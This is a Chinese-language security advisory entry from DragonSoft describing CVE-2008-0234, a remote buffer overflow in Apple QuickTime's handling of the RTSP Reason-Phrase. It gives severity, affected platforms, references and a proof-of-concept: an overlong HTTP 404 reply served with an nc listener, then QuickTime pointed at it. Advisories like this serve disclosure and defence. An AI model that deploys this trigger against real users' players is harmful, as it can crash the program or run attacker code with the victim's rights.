|
|

Apple QuickTime RTSP Reason-Phrase 遠端緩衝區溢位弱點 |
| Others-19 |
高風險 |
影響平台:
Windows NT4, 2000, XP, 2003
|
| |
攻擊需求:
被害者進行存取 |
| |
造成危害:
取得受害者權限 |
| |
 |
攻擊模式: |
| |
The Code
http://aluigi.org/poc/quicktimebof.txt
quicktimebof.txt
HTTP/1.1 404 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxy
nc -l -p 80 -v -v -n < quicktimebof.txt
and then
QuickTimePlayer.exe rtsp://127.0.0.1/file.mp3 |
| |
CVSS 弱點評分:
6.8 |
| |
CVE ID:
CVE-2008-0234
|
| |
| |
 |
內容描述: |
| |
Apple QuickTime Player 7.3.1.70 存在緩衝區溢位弱點, 因為在處理 RTSP Reason-Phrase 時未適當的做好邊界檢查而造成緩衝區溢位, 遠端攻擊者可以製作一個錯誤的回應訊息, 引誘受害者連上惡意的 RTSP 串流, 攻擊成功會當掉程式或以受害者的權限執行任意程式碼. |
| |
 |
修補方式: |
| |
尚未有修補程式. |
| |
 |
相關連結: |
| |
. Apple QuickTime Home Page http://www.apple.com/quicktime/download/ .
US-CERT Vulnerability Note VU#112179 http://www.kb.cert.org/vuls/id/112179 .
Milw0rm Exploit 4885 http://www.milw0rm.com/exploits/4885
|
| |
BugTRAQ ID:
27225
|
| |
| |
發佈日期:
2008-01-12 |
Copyright© DragonSoft Security Associates, Inc.
版權所有© 中華龍網股份有限公司
|
資料庫的內容資訊可能在未經通知下修改. 對於提供的資訊內容並未保證任何性能、適當性或其他任何特殊用途, 其全部之風險均由使用此資訊的使用者自行負擔. 資料庫內容允許非營利事業單位轉載, 但不得將內容予以拷貝修改. 並需註明資料來源.
|
|
|